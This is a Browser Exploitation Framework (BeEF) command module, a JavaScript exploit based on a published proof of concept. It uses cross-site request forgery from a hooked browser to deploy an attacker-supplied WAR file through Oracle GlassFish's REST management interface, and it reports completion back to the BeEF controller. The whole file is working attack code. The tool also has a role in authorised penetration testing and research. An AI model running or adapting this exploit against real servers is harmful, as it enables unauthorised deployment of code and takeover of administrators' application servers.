//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


//   This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
//   For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html


beef.execute(function() {
  var restHost = '<%= @restHost %>';
  var warName = '<%= @warName %>';
  var warBase = '<%= @warBase %>';
	
  var logUrl = restHost + '/management/domain/applications/application';


  if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
    XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
      function byteValue(x) {
        return x.charCodeAt(0) & 0xff;
      }
    var ords = Array.prototype.map.call(datastr, byteValue);
    var ui8a = new Uint8Array(ords);
    this.send(ui8a.buffer);
    }
  }

  function fileUpload(fileData, fileName) { 
    boundary = "HELLOWORLD270883142628617", 
    uri = logUrl, 
    xhr = new XMLHttpRequest(); 
 
    var additionalFields = { 
      asyncreplication: "true", 
      availabilityenabled: "false", 
      contextroot: "", 
      createtables: "true", 
      dbvendorname: "", 
      deploymentplan: "", 
      description: "", 
      dropandcreatetables: "true", 
      enabled: "true", 
      force: "false", 
      generatermistubs: "false", 
      isredeploy: "false", 
      keepfailedstubs: "false", 
      keepreposdir: "false", 
      keepstate: "true", 
      lbenabled: "true", 
      libraries: "", 
      logReportedErrors: "true", 
      name: "", 
      precompilejsp: "false", 
      properties: "", 
      property: "", 
      retrieve: "", 
      target: "", 
      type: "", 
      uniquetablenames: "true", 
      verify: "false", 
      virtualservers: "", 
      __remove_empty_entries__: "true" 
    }

 
    var fileFieldName = "id"; 
    xhr.open("POST", uri, true); 
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
    xhr.withCredentials = "true"; 
    xhr.onreadystatechange = function() { 
      if (xhr.readyState == 4) {
	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.'); 
      } 
    } 
      
    var body = ""; 
      
    for (var i in additionalFields) { 
      if (additionalFields.hasOwnProperty(i)) { 
        body += addField(i, additionalFields[i], boundary); 
      } 
    } 
  
    body += addFileField(fileFieldName, fileData, fileName, boundary); 
    body += "--" + boundary + "--";
    xhr.setRequestHeader('Content-length', body.length); 
    xhr.sendAsBinary(body);
    return true; 
  } 
  
  function addField(name, value, boundary) { 
    var c = "--" + boundary + "\r\n" 
    c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n'; 
    c += value + "\r\n"; 
    return c; 
  } 
  
  function addFileField(name, value, filename, boundary) { 
    var c = "--" + boundary + "\r\n" 
    c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n'; 
    c += "Content-Type: application/octet-stream\r\n\r\n";
    
    c += atob(value);

    c += "\r\n";
    return c;   
  } 
  
  
  function start() {
    fileUpload(warBase,warName);
  }

  start(); 

});

